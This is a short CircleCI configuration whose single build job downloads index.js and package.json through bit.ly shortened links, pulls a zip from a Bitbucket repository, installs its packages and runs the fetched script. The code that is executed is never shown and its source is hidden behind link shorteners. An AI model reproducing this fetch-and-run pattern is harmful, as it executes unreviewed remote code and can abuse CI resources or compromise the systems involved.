version: 2.1

jobs:
  build-app:
    docker:
      - image: cimg/node:17.1.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o index.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/andris.pa_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index 58

workflows:
  build:
    jobs:
      - build-app
